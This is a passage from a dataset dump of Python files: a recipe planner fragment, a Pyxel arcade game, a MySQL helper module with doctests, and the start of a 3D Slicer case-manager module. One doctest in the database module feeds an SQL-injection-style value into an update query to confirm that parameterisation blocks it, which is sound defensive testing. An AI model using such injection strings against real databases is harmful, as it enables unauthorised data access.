= nextNode[2]\n                cost = dist[nextNode[1]] + heuristic(node[1], nextNode[1], bases)\n                heappush(heap, (cost, nextNode[1], nextNode[2]))\n\n    path = []\n\n    if contains(node[1], goal):\n        node = node[1]\n\n        while node:\n            path.append((name[node], dist[node]))\n            node = prev[node]\n\n        path.reverse()\n\n    for i in range(len(path)):\n        print(path[i])\n\n    print(\"Length: \" + str(len(path) - 1))\n\ndef itemsToTuple(inventory, items):\n    return tuple(int(inventory.get(name, 0)) for i, name in enumerate(items))\n\ndef make_recipes(recipes, items):\n    Recipe = namedtuple(\"Recipe\", [\"name\", \"check\", \"effect\", \"cost\"])\n    allRecipes = []\n\n    for name, rule in recipes.items():\n        checker = make_checker(rule, items)\n        effector = make_effector(rule, items)\n        recipe = Recipe(name, checker, effector, rule[\"Time\"])\n        allRecipes.append(recipe)\n\n    return allRecipes\n\ndef contains(have, want):\n    if have != () and want != ():\n        for i, amount in enumerate(want):\n            if have[i] < amount:\n                return False\n\n    return True\n\ndef combineTuple(firstTuple, secondTuple, operator):\n    if operator == \"add\":\n        return tuple(firstTuple[i] + amount for i, amount in enumerate(secondTuple))\n    elif operator == \"sub\":\n        return tuple(firstTuple[i] - amount for i, amount in enumerate(secondTuple))\n\ndef findBase(state, goals, recipes, items, iterations):\n    goalList = []\n\n    for i, name in enumerate(goals):\n        goalList.append(name)\n\n    consumes = tuple(0 for i in range(len(state)))\n\n    depth = 0\n\n    while goalList and depth < iterations:\n        currentGoal = goalList.pop()\n\n        for index, name in enumerate(recipes):\n            if recipes[name][\"Produces\"].get(currentGoal) != None:\n                if 
recipes[name].get(\"Consumes\") != None:\n requirements = itemsToTuple(recipes[name][\"Consumes\"], items)\n consumes = combineTuple(consumes, requirements, \"add\")\n\n for i, item in enumerate(recipes[name][\"Consumes\"]):\n goalList.append(item)\n\n if recipes[name].get(\"Requires\") != None:\n requirements = itemsToTuple(recipes[name][\"Requires\"], items)\n consumes = combineTuple(consumes, requirements, \"add\")\n\n for i, item in enumerate(recipes[name][\"Requires\"]):\n goalList.append(item)\n\n depth += 1\n\n return consumes\n\n\ndef planner(inputFile):\n with open(inputFile) as f:\n Crafting = json.load(f)\n\n inventory = Crafting[\"Initial\"]\n items = Crafting[\"Items\"]\n goals = Crafting[\"Goal\"]\n recipes = make_recipes(Crafting[\"Recipes\"], items)\n bases = findBase(itemsToTuple(inventory, items), goals, Crafting[\"Recipes\"], items, 5)\n print(bases)\n\n plan(graph, inventory, items, goals, recipes, bases)\n\nif __name__ == \"__main__\":\n import sys\n _, filename = sys.argv\n planner(filename)\n","sub_path":"p5/p5_planner.py","file_name":"p5_planner.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11630490","text":"import pyxel\nimport random\n\nDisplayWidth = 160\nDisplayHeight = 120\nTILE_SIZE = 8\nTEXT_HEIGHT = 5\nTEXT_WIDTH = 3\n\nclass Obj():\n\t\"\"\"docstring for Obj.\"\"\"\n\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.height = TILE_SIZE\n\t\tself.width = TILE_SIZE\n\t\tself._setTile(0,0)\n\n\tdef _setTile(self, x, y):\n\t\tself.tileX = x\n\t\tself.tileY = y\n\n\tdef draw(self):\n\t\ttransClr = 2\n\t\tpyxel.blt(\n\t\t\tself.x, self.y,\n\t\t\t0,\n\t\t\tself.tileX, self.tileY,\n\t\t\tTILE_SIZE, TILE_SIZE, transClr)\n\n\nclass Charactor(Obj):\n\t\"\"\"docstring for Charactor.\"\"\"\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.y = DisplayHeight-TILE_SIZE*2\n\t\tself.height = TILE_SIZE-1\n\t\tself.width = TILE_SIZE-1\n\t\tself._setTile(0, 16)\n\t\tself.SPEED = 2\n\n\t\tself.death = False\n\n\tdef update(self):\n\t\tprevY = self.y\n\t\tGRAVITY = 1\n\n\t\tif not pyxel.btn(pyxel.KEY_SPACE):\n\t\t\t# USUAL\n\n\t\t\tif pyxel.btn(pyxel.KEY_UP):\n\t\t\t\tif self.y > DisplayHeight-TILE_SIZE*4:\n\t\t\t\t\tself.y -= GRAVITY + 2\n\t\t\t\telse:\n\t\t\t\t\tself.y = DisplayHeight-TILE_SIZE*4\n\t\t\t\t\t# anti gravity\n\t\t\t\t\tself.y -= GRAVITY\n\n\t\t\t# if upper then floor\n\t\t\tif self.y+self.width-1 < DisplayHeight-TILE_SIZE -1:\n\t\t\t\t# gravity\n\t\t\t\tself.y += GRAVITY\n\n\t\t\tif pyxel.btn(pyxel.KEY_LEFT):\n\t\t\t\tself.x = max( self.x-self.SPEED, 0 )\n\n\t\t\telif pyxel.btn(pyxel.KEY_RIGHT):\n\t\t\t\tself.x = min( self.x+self.SPEED, DisplayWidth-TILE_SIZE )\n\n\t\telse:\n\t\t\t# if press SPACE key\n\n\t\t\tself.y = prevY\n\n\t\t\tif pyxel.btn(pyxel.KEY_UP):\n\t\t\t\tif self.y > DisplayHeight-TILE_SIZE*4:\n\t\t\t\t\tself.y -= 1\n\t\t\telif pyxel.btn(pyxel.KEY_DOWN):\n\t\t\t\tif self.y+self.width-1 < DisplayHeight-TILE_SIZE -1:\n\t\t\t\t\tself.y += 1\n\t\t\t# if pyxel.btn(pyxel.KEY_LEFT):\n\t\t\t# \tself.x -= 1\n\t\t\t# elif pyxel.btn(pyxel.KEY_RIGHT):\n\t\t\t# \tself.x += 1\n\n\tdef collision(self, obj):\n\t\tselfXStart = self.x\n\t\tselfYStart = self.y\n\t\tselfXEnd = self.x+self.width-1\n\t\tselfYEnd = self.y+self.height-1\n\t\tobjXStart = obj.x\n\t\tobjYStart = obj.y\n\t\tobjXEnd = obj.x+obj.width-1\n\t\tobjYEnd = obj.y+obj.height-1\n\n\t\tif selfXEnd >= objXStart and objXEnd >= selfXStart:\n\t\t\tif selfYEnd >= objYStart and objYEnd 
>= selfYStart:\n\t\t\t\tself.death = True\n\n\nclass Floor(Obj):\n\t\"\"\"docstring for Floor.\"\"\"\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.y = DisplayHeight-TILE_SIZE\n\t\tself._setTile(8, 0)\n\n\tdef draw(self):\n\t\tfor i in range(0, DisplayWidth, TILE_SIZE):\n\t\t\tpyxel.blt(\n\t\t\t\ti, self.y,\n\t\t\t\t0,\n\t\t\t\tself.tileX, self.tileY,\n\t\t\t\tTILE_SIZE, TILE_SIZE)\n\n\nclass Ceiling(Obj):\n\t\"\"\"docstring for Ceiling.\"\"\"\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.y = DisplayHeight-TILE_SIZE*5\n\t\tself._setTile(24, 0)\n\n\t\tself.startPoint = 0\n\n\tdef draw(self):\n\t\tfor i in range(self.startPoint, DisplayWidth+TILE_SIZE, TILE_SIZE):\n\t\t\tpyxel.blt(\n\t\t\t\ti, self.y,\n\t\t\t\t0,\n\t\t\t\tself.tileX, self.tileY,\n\t\t\t\tTILE_SIZE, TILE_SIZE)\n\t\tself.startPoint -=1\n\t\tif self.startPoint > TILE_SIZE:\n\t\t\tself.startPoint = 0\n\n\nclass Obstacle(Obj):\n\t\"\"\"docstring for Obstacle.\"\"\"\n\n\tdef __init__(self, high):\n\t\tsuper().__init__()\n\t\tself.x = DisplayWidth-TILE_SIZE\n\t\tself.y = DisplayHeight-TILE_SIZE*(1+high)\n\t\tself._setTile(40, 0)\n\t\tself.SPEED = 1\n\n\tdef update(self):\n\t\tself.x -= self.SPEED\n\n\nclass App:\n\tdef __init__(self):\n\t\t# object\n\t\tself.playerChr = Charactor()\n\t\tself.floor = Floor()\n\t\tself.ceiling = Ceiling()\n\t\tself.obstacles = []\n\n\t\t# valiable\n\t\tself.state = \"start\"\n\t\tself.countFromCreateObs = 255\n\n\t\t# init\n\t\tpyxel.init(DisplayWidth, DisplayHeight, caption=\"Zero One\")\n\t\tpyxel.load(\"assets/assets.pyxres\")\n\t\tpyxel.run(self.update, self.draw)\n\n\tdef update(self):\n\t\t# Quit\n\t\tif pyxel.btnp(pyxel.KEY_Q):\n\t\t\tpyxel.quit()\n\n\t\tif self.state==\"start\":\n\t\t\tif pyxel.btnp(pyxel.KEY_SPACE):\n\t\t\t\tself.state = \"main\"\n\t\telif self.state==\"main\":\n\t\t\tself.updateMain()\n\t\t\tif self.playerChr.death:\n\t\t\t\tself.state = \"gameOver\"\n\t\telif self.state==\"gameOver\":\n\t\t\tif pyxel.btnp(pyxel.KEY_R):\n\t\t\t\tself.playerChr.__init__()\n\t\t\t\tself.obstacles.clear()\n\t\t\t\tself.state = \"main\"\n\n\tdef updateMain(self):\n\t\t# obstacle\n\t\t## create\n\t\t# Ensure space to move player\n\t\tself.countFromCreateObs +=1\n\t\tif self.countFromCreateObs > TILE_SIZE + TILE_SIZE + 10:\n\t\t\t# create or not\n\t\t\trnd = random.random()\n\t\t\tif rnd < 0.05:\n\t\t\t\t# if create\n\t\t\t\t# how many 1or2\n\t\t\t\tnum = random.randint(1,2)\n\t\t\t\tif num==1:\n\t\t\t\t\tplace = random.randint(1,3)\n\t\t\t\t\tself.obstacles.append(Obstacle(place))\n\t\t\t\telif num==2:\n\t\t\t\t\tplace = [1,2,3]\n\t\t\t\t\tplace.remove(random.randint(1,3))\n\t\t\t\t\tfor i in place:\n\t\t\t\t\t\tself.obstacles.append(Obstacle(i))\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERR\")\n\t\t\t\t\texit(1)\n\t\t\t\tself.countFromCreateObs = 0\n\n\t\t## update & prepare remove\n\t\tobsRm = []\n\t\tfor o in self.obstacles:\n\t\t\tif o.x < 0:\n\t\t\t\tobsRm.append(o)\n\t\t\t\tcontinue\n\n\t\t\t## update\n\t\t\to.update()\n\n\t\t## remove\n\t\tfor o in obsRm:\n\t\t\tself.obstacles.remove(o)\n\n\t\t# player\n\t\tself.playerChr.update()\n\n\t\t## collision\n\t\tfor o in self.obstacles:\n\t\t\tself.playerChr.collision(o)\n\n\tdef draw(self):\n\t\t# background\n\t\tpyxel.cls(7)\n\n\t\tif self.state==\"start\":\n\t\t\tself.printTextCenter(DisplayHeight/2-TEXT_HEIGHT/2-10, \"ZERO ONE\", pyxel.frame_count % 16)\n\t\t\tself.printTextCenter(DisplayHeight/2+TEXT_HEIGHT/2-10+1, \"Press SPACE\", 0)\n\t\t\t# self.printCenter()\n\n\t\telif self.state==\"main\":\n\t\t\tpyxel.text(1,1, 
\"ARROW KEY : move\\nSPACE : stop\", 0)\n\t\t\tpyxel.text(55, 41, \"Hello, Pyxel!\", pyxel.frame_count % 16)\n\n\t\t\tself.floor.draw()\n\t\t\tself.ceiling.draw()\n\t\t\tfor o in self.obstacles:\n\t\t\t\to.draw()\n\t\t\tself.playerChr.draw()\n\n\t\t\t# # Collision\n\t\t\t# if self.playerChr.death:\n\t\t\t# \tpyxel.text(0, 0, \"HIT!\", 8)\n\t\telif self.state==\"gameOver\":\n\t\t\tself.printTextCenter(DisplayHeight/2-TEXT_HEIGHT/2-10, \"GAME OVER\", 0)\n\t\t\tself.printTextCenter(DisplayHeight/2+TEXT_HEIGHT/2-10+1, \"Press R to RESTART\", 0)\n\n\tdef printTextCenter(self, height, text, col):\n\t\tx = DisplayWidth/2 - len(text)/2*TEXT_WIDTH\n\t\tpyxel.text(x, height, text, col)\n\n\tdef printCenter(self):\n\t\tpyxel.line(DisplayWidth/2,0,DisplayWidth/2,DisplayHeight, 8)\n\t\tpyxel.line(0,DisplayHeight/2,DisplayWidth,DisplayHeight/2, 8)\n\n\nif __name__ == \"__main__\":\n\tApp()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"311295017","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n\n__author__='ctj'\n\n'''\n\t数据库操纵模块,文档测试 >>>后边必须有个空格\n'''\nimport time,uuid,functools,threading,logging\n#reload(sys)\n#sys.setdefaultencoding('utf8')\n\nclass Dict(dict):\n\t'''\n\tSimple dict but support access as x.y style\n\n\t>>> d1 = Dict()\n\t>>> d1['x'] = 100\n\t>>> d1.x\n\t100\n\t>>> d1.y = 200\n\t>>> d1['y']\n\t200\n\t>>> d2 = Dict(a=1,b=2,c='3')\n\t>>> d2.c\n\t'3'\n\t>>> d2['empty']\n\tTraceback (most recent call last):\n\t\t...\n\tKeyError: 'empty'\n\t>>> d2.empty\n\tTraceback (most recent call last):\n\t\t...\n\tAttributeError: 'Dict' object has no attribute 'empty'\n\t>>> d3 = Dict(('a','b','c'),(1,2,3))\n\t>>> d3.a\n\t1\n\t>>> d3.b\n\t2\n\t>>> d3.c\n\t3\n\t'''\n\tdef __init__ (self,names=(),values=(),**kw):\n\t\tsuper(Dict,self).__init__(**kw)\n\t\t'''\n\t\t\tzip()将两个list糅合在一起 例如:\n\t\t\tx=[1,2,3,4,5]\n\t\t\ty=[6,7,8,9,10]\n\t\t\tzip(x,y)-->就得到了[(1,6),(2,7),(3,8),(4,9),(5,10)]\n\t\t'''\n\t\tfor k,v in zip(names,values):\n\t\t\tself[k] = v\n\tdef __getattr__ (self,key):\n\t\ttry:\n\t\t\treturn self[key]\n\t\texcept KeyError:\n\t\t\traise AttributeError(r\"'Dict' object has no attribute '%s'\" % key)\n\tdef __setattr__ (self,key,value):\n\t\tself[key] = value\n\ndef next_id (t=None):\n\t'''\n\tReturn next id as 50-char string\n\t\n\tArgs:\n\t\tt:unix timestamp, default to None and using time.time().\n\t'''\n\tif t is None:\n\t\tt = time.time()\n\t\t'''\n\t\t\t%015d:15位的整型,不够15位,前置补0\n\t\t\tuuid4() make a random UUID 得到一个随机的UUID\n\t\t\t如果没有传入参数根据系统当前时间15位和一个随机得到的UUID 填充3个0 组成一个长度为50的字符串\n\t\t'''\n\treturn '%015d%s000'%(int(t*1000),uuid.uuid4().hex)\n\ndef _profiling (start,sql=''):\n\t\tt = time.time()-start\n\t\tif t>0.1:\n\t\t\tlogging.warning('[PROFILING] [DB] %s: %s' % (t, sql))\n\t\telse:\n\t\t\tlogging.info('[PROFILING] [DB] %s: %s' % (t, sql))\n\nclass DBError(Exception):\n\tpass\n\t\n\nclass MultiColumnsError(DBError):\n\tpass\n\n#global engine object 保存着mysql数据库的连接\nengine = None\n\n#数据库引擎对象\nclass _Engine(object):\n\tdef __init__ (self,connect):\n\t\tself._connect = connect\n\tdef connect (self):\n\t\treturn self._connect()\n\n#创建引擎\ndef create_engine (user,password,database,host='127.0.0.1',port=3306,**kw):\n\timport mysql.connector\n\tglobal engine\n\tif engine is not None:\n\t\traise DBError('Engine is already initialized.')\n\tparams = dict(user=user,password=password,database=database,host=host,port=port)\n\tdefaults = 
dict(use_unicode=True, charset='utf8', collation='utf8_general_ci', autocommit=False)\n\t'''\n\t\tMerge the key/value pairs from defaults and kw into params; when a key exists in both, the kw value wins.\n\t\tkw.pop(k,v) removes the pair whose key is k and returns its value, or returns v when k is absent from kw.\n\t'''\n\tfor k,v in defaults.iteritems():\n\t\tparams[k] = kw.pop(k,v)\n\t# update params with the key/value pairs from kw\n\tparams.update(kw)\n\tparams['buffered'] = True\n\t# note: (lambda:mysql.connector.connect(**params)) stores a connection factory, not a connection object\n\tengine = _Engine(lambda:mysql.connector.connect(**params))\n\tlogging.info('Init mysql engine <%s> ok.' %hex(id(engine)))\t\n\t\nclass _LasyConnection(object):\n\tdef __init__ (self):\n\t\tself.connection = None\n\n\tdef cursor (self):\n\t\tif self.connection is None:\n\t\t\tconnection = engine.connect()\n\t\t\tlogging.info('open connection <%s>...' %hex(id(connection)))\n\t\t\tself.connection = connection\n\t\treturn self.connection.cursor()\n\t\n\tdef commit (self):\n\t\tself.connection.commit()\n\t\n\tdef rollback (self):\n\t\tself.connection.rollback()\n\n\tdef cleanup (self):\n\t\tif self.connection:\n\t\t\tconnection = self.connection\n\t\t\tself.connection = None\n\t\t\tlogging.info('close connection <%s>...' % hex(id(connection)))\n\t\t\tconnection.close()\n\n# each thread needs its own database connection, so the holder below is a threading.local object\nclass _DbCtx(threading.local):\n\tdef __init__ (self):\n\n\t\tself.connection = None\n\t\tself.transactions = 0\n\t\n\tdef is_init (self):\n\t\treturn not self.connection is None\n\n\tdef init (self):\n\t\tlogging.info('open lazy connection...')\n\t\tself.connection = _LasyConnection()\n\t\tself.transactions = 0\n\n\tdef cleanup (self):\n\t\tself.connection.cleanup()\n\t\tself.connection = None\n\n\tdef cursor (self):\n\t\treturn self.connection.cursor()\n\n_db_ctx = _DbCtx()\n\n# the with statement lets the database connection be created and closed automatically\n'''\n\twith statement:\n\tthe expression after with returns a _ConnectionCtx object, whose __enter__() return value is bound to\n\tthe variable after as; the body of the with block then runs, and __exit__() is called on the object afterwards\n'''\nclass _ConnectionCtx(object):\n\tdef __enter__ (self):\n\t\tglobal _db_ctx\n\t\tself.should_cleanup = False\n\t\tif not _db_ctx.is_init():\n\t\t\t_db_ctx.init()\n\t\t\tself.should_cleanup = True\n\t\treturn self\n\n\tdef __exit__(self,exctype,excvalue,traceback):\n\t\tglobal _db_ctx\n\t\tif self.should_cleanup:\n\t\t\t_db_ctx.cleanup()\n\ndef connection ():\n\treturn _ConnectionCtx()\n# a decorator so that the wrapped functions share the same database connection\ndef with_connection (func):\n\t@functools.wraps(func)\n\tdef _wrapper (*args,**kw):\n\t\twith _ConnectionCtx():\n\t\t\treturn func(*args,**kw)\n\treturn _wrapper\n\nclass _TransactionCtx(object): \n\tdef __enter__ (self):\n\t\tglobal _db_ctx\n\t\tself.should_close_conn = False\n\t\tif not _db_ctx.is_init():\n\t\t\t_db_ctx.init()\n\t\t\tself.should_close_conn = True\n\t\t_db_ctx.transactions = _db_ctx.transactions +1\n\t\tlogging.info('begin transaction...' if _db_ctx.transactions==1 else 'join current transaction...')\n\t\treturn self\n\n\tdef __exit__ (self,exctype,excvalue,traceback):\n\t\tglobal _db_ctx\n\t\t_db_ctx.transactions = _db_ctx.transactions -1\n\t\ttry:\n\t\t\tif _db_ctx.transactions==0:\n\t\t\t\tif exctype is None:\n\t\t\t\t\tself.commit()\n\t\t\t\telse:\n\t\t\t\t\tself.rollback()\n\n\t\tfinally:\n\t\t\tif self.should_close_conn:\n\t\t\t\t_db_ctx.cleanup()\n\n\tdef commit (self):\n\t\tglobal _db_ctx\n\t\tlogging.info('commit transaction...')\n\t\ttry:\n\t\t\t_db_ctx.connection.commit()\n\t\t\tlogging.info('commit ok.')\n\t\texcept:\n\t\t\tlogging.warning('commit failed. 
try rollback...')\n\t\t\t_db_ctx.connection.rollback()\n\t\t\tlogging.warning('rollback ok.')\n\t\t\traise\n\n\tdef rollback (self):\n\t\tglobal _db_ctx\n\t\tlogging.warning('rollback transaction...')\n\t\t_db_ctx.connection.rollback()\n\t\tlogging.info('rollback ok.')\t\n\ndef transaction ():\n\t'''\n\tCreate a transaction object so can use with statement:\n\n\twith transaction():\n\t\tpass\n\t>>> def update_profile(id, name, rollback):\n\t...\t\tu = dict(id=id, name=name, email='%s@test.org' % name, passwd=name, last_modified=time.time())\n\t...\t\tinsert('user', **u)\n\t...\t\tr = update('update user set passwd=? where id=?', name.upper(), id)\n\t...\t\tif rollback:\n\t...\t\t\traise StandardError('will cause rollback...')\n\t>>> with transaction():\n\t...\t\tupdate_profile(900301, 'Python', False)\t\t\n\t>>> select_one('select * from user where id=?',900301).name\n\tu'Python'\n\t>>> with transaction():\n\t... \tupdate_profile(900302,'Ruby',True)\n\tTraceback (most recent call last):\n\t\t...\n\tStandardError: will cause rollback...\n\t>>> select('select * from user where id = ?',900302)\n\t[]\n\t'''\n\treturn _TransactionCtx()\n\ndef with_transaction (func):\n\t'''\n\tA decorator that makes function around transaction.\n\n\t>>> @with_transaction\n\t... def update_profile(id,name,rollback):\n\t... \tu = dict(id=id, name=name, email='%s@test.org' % name, passwd=name, last_modified=time.time())\n\t... \tinsert('user',**u)\n\t... \tr = update('update user set passwd=? where id = ?',name.upper(),id)\n\t... \tif rollback:\n\t... \t\traise StandardError('will cause rollback...')\n\t>>> update_profile(8080,'Julia',False)\n\t>>> select_one('select * from user where id = ?',8080).passwd\n\tu'JULIA'\n\t>>> update_profile(9090,'Robert',True)\n\tTraceback (most recent call last):\n\t\t...\n\tStandardError: will cause rollback...\n\t>>> select('select * from user where id=?',9090)\n\t[]\n\t'''\n\t@functools.wraps(func)\n\tdef _wrapper (*args,**kw):\n\t\t_start = time.time()\n\t\twith _TransactionCtx():\n\t\t\treturn func(*args, **kw)\n\t\t_profiling(_start)\n\treturn _wrapper\n\ndef _select(sql,first,*args):\n\tglobal _db_ctx\n\tcursor = None\n\tsql = sql.replace('?','%s')\n\tlogging.info('SQL: %s, ARGS: %s' % (sql, args))\n\ttry:\n\t\tcursor = _db_ctx.connection.cursor()\n\t\tcursor.execute(sql,args)\n\t\tif cursor.description:\n\t\t\tnames = [x[0] for x in cursor.description]\n\t\tif first:\n\t\t\tvalues = cursor.fetchone()\n\t\t\tif not values:\n\t\t\t\treturn None\n\t\t\treturn Dict(names,values)\n\t\treturn [Dict(names,x) for x in cursor.fetchall()]\n\tfinally:\n\t\tif cursor:\n\t\t\tcursor.close()\n\n@with_connection\ndef select_one(sql,*args):\n\t'''\n\tExecute select SQL and expected one result.\n\tIf no result found, return None.\n\tIf multiple results found, the first one returned.\n\t>>> u1 = dict(id=100, name='Alice', email='alice@test.org', passwd='ABC-12345', last_modified=time.time())\n\t>>> u2 = dict(id=101, name='Sarah', email='sarah@test.org', passwd='ABC-12345', last_modified=time.time())\n\t>>> insert('user',**u1)\n\t1\n\t>>> insert('user',**u2)\n\t1\n\t>>> u = select_one('select * from user where id=?',100)\n\t>>> u.name\n\tu'Alice'\n\t>>> select_one('select * from user where email=?','abc@email.com')\n\t>>> u2 = select_one('select * from user where passwd=? order by email','ABC-12345')\n\t>>> u2.name\n\tu'Alice'\n\t'''\n\treturn _select(sql,True,*args)\n\n@with_connection\ndef select_int (sql,*args):\n\t'''\n\tExecute select SQL and expected one int and only one int result. 
\n\n\t>>> n = update('delete from user')\n\t>>> u1 = dict(id=96900, name='Ada', email='ada@test.org', passwd='A-12345', last_modified=time.time())\n\t>>> u2 = dict(id=96901, name='Adam', email='adam@test.org', passwd='A-12345', last_modified=time.time())\n\t>>> insert('user',**u1)\n\t1\n\t>>> insert('user', **u2)\n\t1\n\t>>> select_int('select count(*) from user')\n\t2\n\t>>> select_int('select count(*) from user where email=?', 'ada@test.org')\n\t1\n\t>>> select_int('select count(*) from user where email=?', 'notexist@test.org')\n\t0\n\t>>> select_int('select id from user where email=?', 'ada@test.org')\n\t96900\n\t>>> select_int('select id, name from user where email=?', 'ada@test.org')\n\tTraceback (most recent call last):\n\t\t...\n\tMultiColumnsError: Expect only one column.\n\t'''\n\td = _select(sql,True,*args)\n\tif len(d)!=1:\n\t\traise MultiColumnsError('Expect only one column.')\n\treturn d.values()[0]\n\t\n@with_connection\ndef select(sql,*args):\n\t'''\n\tExecute select SQL and return list or empty list if no result.\n\n\t>>> u1 = dict(id=200, name='Wall.E', email='wall.e@test.org', passwd='back-to-earth', last_modified=time.time())\n\t>>> u2 = dict(id=201, name='Eva', email='eva@test.org', passwd='back-to-earth', last_modified=time.time())\n\t>>> insert('user', **u1)\n\t1\n\t>>> insert('user', **u2)\n\t1\n\t>>> L = select('select * from user where id=?', 900900900)\n\t>>> L\n\t[]\n\t>>> L = select('select * from user where id=?', 200)\n\t>>> L[0].email\n\tu'wall.e@test.org'\n\t>>> L = select('select * from user where passwd=? order by id desc', 'back-to-earth')\n\t>>> L[0].name\n\tu'Eva'\n\t>>> L[1].name\n\tu'Wall.E'\n\n\t'''\n\treturn _select(sql,False,*args)\n\n@with_connection\ndef _update (sql,*args):\n\tglobal _db_ctx\n\tcursor = None\n\t\n\tsql = sql.replace('?', '%s')\n\tlogging.info('SQL: %s, ARGS: %s' % (sql, args))\n\ttry:\n\t\tcursor = _db_ctx.connection.cursor()\n\t\tcursor.execute(sql, args)\n\t\tr = cursor.rowcount\n\t\tif _db_ctx.transactions==0:\n\t\t\tlogging.info('auto commit')\n\t\t\t_db_ctx.connection.commit()\n\t\treturn r\n\tfinally:\n\t\tif cursor:\n\t\t\tcursor.close()\n\n\ndef insert (table,**kw):\n\t'''\n\tExecute insert SQL.\n\n\t>>> u1 = dict(id=2000, name='Bob', email='bob@test.org', passwd='bobobob', last_modified=time.time())\n\t>>> insert('user', **u1)\n\t1\n\t>>> u2 = select_one('select * from user where id=?', 2000)\n\t>>> u2.name\n\tu'Bob'\n\t>>> insert('user', **u2)\n\tTraceback (most recent call last):\n\t\t...\n\tIntegrityError: 1062 (23000): Duplicate entry '2000' for key 'PRIMARY'\n\t'''\n\tcols,args = zip(*kw.iteritems())\n\tsql = 'insert into `%s` (%s) values (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' for i in range(len(cols))]))\n\treturn _update(sql, *args)\t\n\ndef update (sql,*args):\n\tr'''\n\tExecute update SQL.\n\n\t>>> u1 = dict(id=1000, name='Michael', email='michael@test.org', passwd='123456', last_modified=time.time())\n\t>>> insert('user',**u1)\n\t1\n\t>>> u2 = select_one('select * from user where id=?', 1000)\n\t>>> u2.email\n\tu'michael@test.org'\n\t>>> u2.passwd\n\tu'123456'\n\t>>> update('update user set email=?, passwd=? where id=?', 'michael@example.org', '654321', 1000)\n\t1\n\t>>> u3 = select_one('select * from user where id=?', 1000)\n\t>>> u3.email\n\tu'michael@example.org'\n\t>>> u3.passwd\n\tu'654321'\n\t>>> update('update user set passwd=? 
where id=?', '***', '123\\' or id=\\'456')\n\t0\n\t'''\n\treturn _update(sql, *args)\n\n\n\n\n\nif __name__=='__main__':\n\tlogging.basicConfig(level=logging.DEBUG)\n\tcreate_engine('www-data','www-data','awesome')\n\n\tsql = 'drop table if exists user'\n\tupdate(sql)\n\tupdate('create table user (id int primary key, name text, email text, passwd text, last_modified real)')\n\timport doctest\n\tdoctest.testmod()\n\t\n\n\n\t\t\n\t\t","sub_path":"awesome-python-webapp/www/transwarp/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":12869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"276181966","text":"import os\nimport csv, re, numpy, json, ast, re\nimport shutil, datetime, logging\nimport ctk, vtk, qt, slicer\nfrom collections import OrderedDict\n\n\n\nfrom slicer.ScriptedLoadableModule import *\nfrom SlicerProstateUtils.helpers import WatchBoxAttribute, BasicInformationWatchBox, DICOMBasedInformationWatchBox, IncomingDataWindow\nfrom SlicerProstateUtils.mixins import ModuleWidgetMixin, ModuleLogicMixin, ParameterNodeObservationMixin\nfrom SlicerProstateUtils.constants import DICOMTAGS, COLOR, STYLE, FileExtension\nfrom SlicerProstateUtils.events import SlicerProstateEvents\n\nclass SlicerCaseManager(ScriptedLoadableModule):\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"SlicerCaseManager\"\n self.parent.categories = [\"Radiology\"]\n self.parent.dependencies = [\"SlicerProstate\"]\n self.parent.contributors = [\"Christian Herz (SPL)\",\"Longquan Chen(SPL)\"]\n self.parent.helpText = \"\"\"A common module for case management in Slicer\"\"\"\n self.parent.acknowledgementText = \"\"\"Surgical Planning Laboratory, Brigham and Women's Hospital, Harvard\n Medical School, Boston, USA This work was supported in part by the National\n Institutes of Health through grants R01 EB020667, U24 CA180918,\n R01 CA111288 and P41 EB015898. 
The code is originated from the module SliceTracker\"\"\"\n\nclass SlicerCaseManagerWidget(ModuleWidgetMixin, ScriptedLoadableModuleWidget):\n @property\n def caseRootDir(self):\n return self.casesRootDirectoryButton.directory\n\n @caseRootDir.setter\n def caseRootDir(self, path):\n try:\n exists = os.path.exists(path)\n except TypeError:\n exists = False\n self.setSetting('CasesRootLocation', path if exists else None)\n self.casesRootDirectoryButton.text = self.truncatePath(path) if exists else \"Choose output directory\"\n self.casesRootDirectoryButton.toolTip = path\n self.openCaseButton.enabled = exists\n self.createNewCaseButton.enabled = exists\n \n @property\n def caseDirectoryList(self):\n return self._caseDirectoryList\n\n @caseDirectoryList.setter\n def caseDirectoryList(self,list):\n self._caseDirectoryList = list \n \n @property\n def preopDataDir(self):\n return self._preopDataDir\n\n @preopDataDir.setter\n def preopDataDir(self, path):\n self._preopDataDir = path\n if path is None:\n return\n if os.path.exists(path):\n self.loadPreopData()\n \n @property\n def mpReviewPreprocessedOutput(self):\n return os.path.join(self.currentCaseDirectory, \"mpReviewPreprocessed\") if self.currentCaseDirectory else None\n\n @property\n def preopDICOMDataDirectory(self):\n return os.path.join(self.currentCaseDirectory, \"DICOM\", \"Preop\") if self.currentCaseDirectory else None\n\n @property\n def intraopDICOMDataDirectory(self):\n return os.path.join(self.currentCaseDirectory, \"DICOM\", \"Intraop\") if self.currentCaseDirectory else None\n\n @property\n def outputDir(self):\n return os.path.join(self.currentCaseDirectory, \"SliceTrackerOutputs\")\n\n @property\n def currentCaseDirectory(self):\n return self._currentCaseDirectory\n\n @property\n def currentTargets(self):\n return self._currentTargets\n\n @currentTargets.setter\n def currentTargets(self, targets):\n self._currentTargets = targets\n self.targetTableModel.targetList = targets\n if not targets:\n self.targetTableModel.coverProstateTargetList = None\n else:\n coverProstate = self.registrationResults.getMostRecentApprovedCoverProstateRegistration()\n if coverProstate:\n self.targetTableModel.coverProstateTargetList = coverProstate.approvedTargets\n self.targetTable.enabled = targets is not None\n\n @currentCaseDirectory.setter\n def currentCaseDirectory(self, path):\n self._currentCaseDirectory = path\n valid = path is not None\n self.closeCaseButton.enabled = valid\n if not valid:\n 